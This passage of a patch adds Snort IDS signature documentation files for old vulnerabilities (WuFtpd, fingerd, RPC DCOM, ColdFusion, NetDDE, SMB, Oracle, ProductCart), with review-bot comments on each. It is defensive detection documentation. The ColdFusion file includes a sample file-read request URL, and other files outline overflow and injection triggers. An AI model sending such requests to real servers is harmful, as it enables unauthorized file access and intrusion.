+Bugtraq:
+http://www.securityfocus.com/bid/866/exploit/
+
+CERT:
+http://www.cert.org/advisories/CA-1999-16.html
+
+--
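
Review bot: the `--` separators after Rule and Sid are followed by an extra blank line (`+--` / `+` / `+Sid:`), which differs from the layout in the rest of the patch, and the line after `+	Solaris 2.5 through 2.7` contains only a space. 'vulnerabilites' in Ease of Attack should be 'vulnerabilities', and the second Corrective Action sentence lacks a period.
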
--- /dev/null
+++ b/doc/signatures/2343.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2343
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow vulnerability associated with WuFtpd STOR command. 
+
+--
+Impact:
+Remote access.  A successful attack may permit the remote execution of 
+arbitrary commands with system privileges.
+
+--
+Detailed Information:
+WuFtpd is an FTP server based on BSD ftpd. A vulnerability exists 
+with the STOR command that can cause a buffer overflow and permit the 
+execution of arbitrary commands with system privileges. The buffer 
+overflow can be caused by supplying an overly long argument to the STOR 
+command.
+
+The issue exists in the SockPrintf() function. A server using the
+MAIL_ADMIN option to send email notifications to the administrator when
+files are uploaded to the server, is vulnerable to the attack. It is
+possible for an attacker to send malformed data to the store() function
+via sockprintf() that will cause the overflow condition to occur, the
+error can be generated by the attacker creating a filename greater than
+32768 bytes in length.
+
+--
+Affected Systems:
+	
+
+--
+Attack Scenarios:
+An attacker can supply an overly long file argument with the STOR 
+command, causing a buffer overflow.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Use scp as an alternative to ftp
+
+Disallow ftp access to internal resources from external sources
+
+Disable the MAIL_ADMIN option
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
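Review bot: Affected Systems is an empty section (a lone tab under the header) and Additional References is empty too, for a doc that describes one specific WuFtpd STOR overflow; either list the affected versions or mark the field "Unknown" rather than leaving it blank. In Detailed Information the function is spelled both "SockPrintf()" and "sockprintf()"; pick one. The last sentence there is a comma splice ("...cause the overflow condition to occur, the error can be generated by...") and should be split, e.g. "...to occur. The overflow is triggered by supplying a filename longer than 32768 bytes."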
--- /dev/null
+++ b/doc/signatures/321.txt
@@ -0,0 +1,65 @@
+Rule: 
+
+--
+Sid: 321
+
+-- 
+Summary: 
+An information leak exploit against the old Solaris finger daemon
+
+-- 
+Impact: 
+Intelligence gathering activity. The attacker may be trying to obtain a list of accounts on the victim host.
+
+--
+Detailed Information:
+The rule generates an event when an attempt is made to exploit a bug in the Solaris "fingerd" daemon. The bug allows the attacker to obtain the lists of accounts existing on the Sun system by issuing a specially crafted finger request. 
+
+Obtaining a list of accounts may precipitate a password guessing attack, an email attack or other abuses against those accounts.
+
+--
+Attack Scenarios: 
+An attacker may learn that a "guest" account exists on the system and has never been used. He might then guesse the password for this account and is now able to log in to the system remotely using telnet or ssh for example. This might then lead to further system compromise and escalated privileges for the attacker.
+
+-- 
+Ease of Attack: 
+Simple
+No exploit software required
+
+-- 
+
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+
+Corrective Action: 
+Look for other IDS events involving the same IP addresses
+
+Check system logs for suspicious logins to the affected system, 
+
+Disable the fingerd daemon 
+
+Apply a vendor patch that removes the vulnerability
+
+--
+Contributors: 
+Original rule writer unknown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=10788
+
+Securiteam
+http://www.securiteam.com/unixfocus/6B00M0U2UW.html
+
+--
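Review bot: "guesse" in Attack Scenarios should be "guess", and "is now able to log in" reads better as "would then be able to log in". This file also omits the Affected Systems section that every other doc in the patch carries; since Detailed Information names "the Solaris "fingerd" daemon", an entry listing Solaris would fit. Several separators here are "-- " with trailing whitespace and the Sid is written on one line ("Sid: 321") instead of the two-line form used elsewhere; worth normalising so anything that parses these files sees a single format.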
--- /dev/null
+++ b/doc/signatures/100000399.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000399
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "flbchart.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "flbchart.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
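Review bot: the third paragraph of Detailed Information ("Some applications do not perform stringent checks when validating the credentials of a client host...") is generic CGI-authentication boilerplate describing a different attack class from the remote file include named in the Summary; the same text appears in 877.txt and 1766.txt in this patch. Suggest cutting it here so the doc stays about "babInstallPath" in "flbchart.php". Also: "an exploitation attempt has been attempted" in the Summary is redundant, "ona web server" is missing a space, "attackers choosing" needs an apostrophe, and the file opens with two blank lines before "Rule:".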
--- /dev/null
+++ b/doc/signatures/1344.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1341
+
+--
+Summary:
+Attempted cc command access via web
+
+--
+Impact:
+Attempt to compile a binary on a host.
+
+--
+Detailed Information:
+This is an attempt to compiile a C or C++ source on a host. The cc
+command is theGNU project's C and C++ compiler used to compile C and
+C++ sourcefiles into executable binary files. The attacker could
+possibly compilea program needed for other attacks on the system or
+install a binaryprogram of his choosing.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains 'cc'in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+Web sites using spaces in filenames that also contain the characters
+"cc" may cause this rule to generate an event. For example, the URI
+http://www.foo.com/bar/filecc here.htm will cause an event to be
+generated.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries
+outside of it'sdesignated web root or cgi-bin. This command may also
+be requested ona command line should the attacker gain access to the
+machine. Wheneverpossible, sensitive files and certain areas of the
+filesystem shouldhave the system immutable flag set to prevent files
+from being addedto the host. On BSD derived systems, setting the
+systems runtimesecurelevel also prevents the securelevel from being
+changed. (note: thesecurelevel can only be increased).
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1342
+sid: 1343
+sid: 1344
+sid: 1345
+sid: 1346
+sid: 1347
+sid: 1348
+
+--
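Review bot: the Sid field says 1341 but this file is doc/signatures/1344.txt, and Additional References lists "sid: 1344" as a related rule, so the header looks like a leftover from copying 1341.txt; the Sid line should read 1344 and the cross-reference list should carry 1341 instead of 1344. Many words are run together throughout ("compiile", "theGNU", "sourcefiles", "compilea", "binaryprogram", "'cc'in", "it'sdesignated", "ona", "Wheneverpossible", "shouldhave", "addedto", "runtimesecurelevel", "thesecurelevel"). Finally, "The cc command is theGNU project's C and C++ compiler" is inaccurate: cc is the conventional name of the system C compiler on Unix systems; the GNU compiler is gcc, which cc may or may not be linked to.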
--- /dev/null
+++ b/doc/signatures/3389.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3389
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
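Review bot: "Expoit" in Ease of Attack should be "Exploit". Additional References is empty even though Corrective Action tells the reader to "Apply the appropriate vendor supplied patches"; the Microsoft bulletin for this RPC DCOM issue should be cited so the patch can be located. Note also that this body text is reused verbatim in 3289.txt and 3400.txt later in the patch; a sentence on what distinguishes sid 3389 from those rules would make each of the three docs useful on its own.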
--- /dev/null
+++ b/doc/signatures/906.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+906
+
+--
+Summary:
+This event is generated when an attempt is made to access an Example 
+application on a Coldfusion 4.x server. 
+
+--
+Impact:
+Serious. The vulnerability is not limited to files in the webspace, so
+system files or additional unexecuted code files could be retrieved and
+examined for vulnerabilities.
+
+--
+Detailed Information:
+ColdFusion (Macromedia, formerly Allaire) web servers have several
+default Example applications installed that have vulnerabilities.  The
+email application can be exploited to allow remote viewing of arbitrary
+files.
+
+
+--
+Affected Systems:
+	ColdFusion versions 2.x, 3.x, 4.x for Windows
+	ColdFusion versions 4.x for Solaris, HP-UX
+	ColdFusion versions 4.5.x for Linux
+
+--
+Attack Scenarios:
+The example application file cfdocs/exampleapp/email/getfile.cfm can 
+accept URL-mangled requests like:
+
+http://www.server.com/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
+
+This allows trivial remote retrieval of any file on the server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+If ColdFusion 4.x's example code is being used, This rule will generate 
+an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Delete all example code.  This is one of several significant
+vulnerabilities that are exploitable if the example code is left on a
+production server.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Darryl Davidson <ddavidson@talisman-intl.com>
+
+-- 
+Additional References:
+
+CAN-2001-0535
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0535
+
+Macromedia Security Bulletin (MPSB01-08)
+http://www.macromedia.com/devnet/security/security_zone/mpsb01-08.html
+
+--
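Review bot: the Summary restricts the event to "a Coldfusion 4.x server" while Affected Systems lists 2.x, 3.x, 4.x and 4.5.x; align the Summary with the version list or explain why only 4.x is relevant to this rule. False Positives has a capital "This" mid-sentence ("...is being used, This rule will..."), and the product name is spelled both "Coldfusion" and "ColdFusion". The sample URL in Attack Scenarios is helpful, but since the "Rule:" field is empty the reader cannot tell which part of that request the rule keys on; a line under Detailed Information naming the matched path would close that gap.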
--- /dev/null
+++ b/doc/signatures/555.txt
@@ -0,0 +1,55 @@
+Rule:
+
+--
+Sid:
+555
+
+--
+Summary:
+This event is generated when activity by Peer-to-Peer (p2p) clients is detected.
+
+--
+Impact:
+Informational event. Unauthorized use of a p2p client may be in progress.
+
+--
+Detailed Information:
+This event indicates that use of a p2p client has been detected. This may be against corporate policy. p2p clients connect to other p2p clients to share files, commonly music and video files but can be configured to share any file on the local machine.
+
+This activity may not only use bandwidth but may also be used to transfer company confidential information to unauthorized hosts external to the protected network bypassing other security measures in place.
+
+--
+Affected Systems:
+Any host using a p2p client.
+
+--
+Attack Scenarios:
+This is indicative of the use of a p2p client.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Check the host and uninstall any p2p client found.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
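Review bot: the Summary says only "activity by Peer-to-Peer (p2p) clients", and no client or protocol is named anywhere in the file, so an analyst seeing sid 555 cannot tell which client produced the alert; name the client or protocol the rule matches. For a policy rule of this kind, "False Positives: None known" is also hard to credit; any legitimate traffic sharing the matched pattern should be listed, or the field marked "Unknown".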
--- /dev/null
+++ b/doc/signatures/2256.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2256
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability associated with the Remote Procedure Call (RPC) sadmind.
+
+--
+Impact:
+Remote root access.  This attack may permit execution of arbitrary commands with the privileges of root.
+
+--
+Detailed Information:
+The sadmind RPC service is used by Solaris Solstice AdminSuite 
+applications to perform remote distributed system administration tasks 
+such as adding new users.  
+
+This event indicates that an RPC query for the sadmind service has been
+made with the credentials of the root user supplied.
+
+This may permit execution of arbitrary commands with the privileges of root.
+
+--
+Affected Systems:
+All systems using sadmind
+
+--
+Attack Scenarios:
+Exploit code can be used to attack a vulnerable sadmind to obtain root access to the remote host.
+
+--
+Ease of Attack:
+Simple.  Exploit scripts are freely available. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
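Review bot: the second Corrective Action sentence is garbled: "Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines" should say that access to RPC-enabled machines is denied from outside the protected network. Corrective Action also omits applying vendor patches, which the other exploit docs in the patch include. Additional References is empty, and Affected Systems says "All systems using sadmind" while the earlier sadmind doc in this patch lists "Solaris 2.5 through 2.7"; either a version list or a note that this rule is version-independent would reconcile the two.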
--- /dev/null
+++ b/doc/signatures/807.txt
@@ -0,0 +1,69 @@
+Rule:  
+
+Sid:
+807
+
+--
+
+Summary:
+This event is generated when an attempt is made to download the wwwboard password file
+
+--
+Impact:
+Information disclosure.
+An attacker could crack the encrypted password and gain access to the wwwboard
+administrator account
+
+--
+Detailed Information:
+Releases of WWWBoard (Matt Wright's CGI webboard application) before
+version 2.0 Alpha 2.1 place the encrypted password for the web 
+application's administrator in a file called "passwd.txt" accessible
+from the web root.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+Attacker downloads the passwd.txt file and then launches a password
+cracker to brute force the password (the password is encypted via
+crypt(3), and password crackers for this format are ubiquitous).  If
+the password is successfully cracked (due to weak passwords or
+significant cracking resources), the attacker will have administrative
+access to the wwwboard web application.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Inspect packet to insure that it was an attempt to download the
+password file and not just a webpage discussing WWWBoard.
+Insure that local installations of WWWBoard are current and properly
+configured to not save the password file into a publically-accessible
+area.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+CVE:  CVE-1999-0953
+Bugtraq:  BID 649
+Arachnids:  463
+
+--
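Review bot: the first Corrective Action sentence ("Inspect packet to insure that it was an attempt to download the password file and not just a webpage discussing WWWBoard") is false-positive guidance and contradicts "False Positives: None Known" directly above it; move it under False Positives. Typos: "insure" twice (should be "ensure"), "encypted", "unkown", "publically". Structurally, "Rule:" is followed straight by "Sid:" with no "--" separator, unlike every other file, and Affected Systems is empty. The three references are bare identifiers (CVE-1999-0953, BID 649, Arachnids 463) where the other docs give URLs; the URL form would be consistent.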
--- /dev/null
+++ b/doc/signatures/1766.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1766
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
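Review bot: nothing in this file is specific to sid 1766: the Summary ("a known vulnerability on a web server or a web application"), Affected Systems ("All systems using a web server") and the credential-validation paragraph are boilerplate shared with 877.txt in this patch. At minimum, Detailed Information should name the server or application and the request pattern the rule matches. "attackers choosing" needs an apostrophe.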
--- /dev/null
+++ b/doc/signatures/2970.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2970
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
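Review bot: Ease of Attack says "Simple." while Detailed Information notes "This service is not started by default on Microsoft Windows systems", so remote exploitation needs NetDDE to have been enabled; qualify the rating (e.g. "Simple where the service is enabled") so the two sections agree. Minor: the first Corrective Action line lacks a terminal period.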
--- /dev/null
+++ b/doc/signatures/3141.txt
@@ -0,0 +1,77 @@
+Rule: 
+
+--
+Sid: 
+3141
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft systems using Server Message Block (SMB).
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+SMB is a client - server protocol used in sharing resources such as
+files, printers, ports, named pipes and other things, between machines
+on a network.
+
+A vulnerability in the Microsoft implementation of SMB exists due to a
+programming error which may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain unauthorized access to the target host.
+
+A malicious attacker can exploit the vulnerability by sending a
+malicious response from a server in response to a client request using
+SMB.
+
+--
+Affected Systems:
+	Microsoft Windows 2003
+	Microsoft Windows 2000
+	Microsoft Windows XP
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message from the server
+containing code of their choosing to be run on the client.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+Turn off windows file and print services.
+
+Use Samba as an alternative.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+eEye:
+http://www.eeye.com/html/research/advisories/AD20050208.html
+
+--
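Review bot: Corrective Action does not fit the attack described. Detailed Information and Attack Scenarios describe a malicious server response exploiting the SMB client ("code of their choosing to be run on the client"), yet the advice is "Turn off windows file and print services" and "Use Samba as an alternative": disabling the local server side does not stop a Windows client from connecting to a hostile server, and Samba is a server implementation, so neither mitigates this. Keep "Apply the appropriate vendor supplied patches" and replace the other two with client-side advice such as blocking outbound SMB to untrusted networks. Also "client - server" should be "client-server", and "A malicious attacker" is redundant.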
--- /dev/null
+++ b/doc/signatures/877.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+877
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
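Review bot: this is the same generic CGI text used in 100000399.txt and 1766.txt; nothing identifies what sid 877 matches (script name, parameter or request pattern), and "All systems running CGI applications" as Affected Systems is too broad to act on. "ona web server" is missing a space and "attackers choosing" needs an apostrophe.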
--- /dev/null
+++ b/doc/signatures/933.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+933
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a ColdFusion web server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Coldfusion. Many known vulnerabilities exist for this platform and 
+the attack scenarios are legion.
+
+--
+Affected Systems:
+	All systems running ColdFusion
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
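Review bot: the doc never says which ColdFusion component or request sid 933 matches; "Many known vulnerabilities exist for this platform and the attack scenarios are legion" gives an analyst nothing to verify an alert against. Name the path or feature the rule keys on and, if known, the vulnerability (906.txt in this patch, which gives the file and a sample URL, is the model). "Coldfusion" in Detailed Information should be "ColdFusion" as in the Summary.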
--- /dev/null
+++ b/doc/signatures/2137.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2137
+
+--
+Summary:
+This event is generated when an attempt is made to access the administration page for the Philboard ASP application. 
+
+--
+Impact:
+Possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to access the administration page for the Philboard Active Server Page (ASP) application.
+
+This rule generates an event if the attacker makes a request for the administration page from a source external to the protected network.
+
+
+--
+Affected Systems:
+Any host using Philboard.
+
+--
+Attack Scenarios:
+An attacker can gain administrator access to the application by making a simple web request if a specific cookie value is set to "True".
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+This event may be generated by an administrator accessing the administration page from an external source.
+
+The event will also be generated if Nessus is used to scan the host for this vulnerability.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Deny access to this page from sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
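Review bot: Attack Scenarios says access is granted "if a specific cookie value is set to "True"", but neither the cookie name nor the administration page path appears anywhere in the file, so the reader cannot check an alert against a packet; add both to Detailed Information. The False Positives entry covering administrators and Nessus scans is a useful model that the other docs lack. Additional References is empty and followed by two blank lines.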
--- /dev/null
+++ b/doc/signatures/2762.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2762
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure define_site_priority
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
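Review bot: the sentence naming the procedure is broken across lines in Detailed Information ("...vulnerability in the procedure define_site_priority" / ". This procedure is included in" / "dbms_repcat."); rejoin it as "vulnerability in the procedure define_site_priority, which is included in the dbms_repcat package." Affected Systems reads "Oracle Oracle9i" (vendor name duplicated), and Additional References is empty although Corrective Action points to a vendor patch; a vendor reference for the issue should be cited.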
--- /dev/null
+++ b/doc/signatures/2249.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2249
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the ASP application ProductCart.
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+It is possible to inject SQL commands into the ASP application 
+ProductCart which could lead to the disclosure of information relating 
+to the underlying database and records contained in that database.
+
+--
+Affected Systems:
+	EarlyImpact ProductCart 2br000, 2, 1.6br003, 1.6br001, 1.6br, 1.6b003, 1.6b002, 1.6b001, 1.6b, 1.6003, 1.6002, 1.5004, 1.5003r, 1.5, 1.5002, 1.5003
+
+--
+Attack Scenarios:
+The attacker can supply SQL commands via a URI to access sensitive information.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Harded the system in the manner recommended by the vendor.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Vendor information:
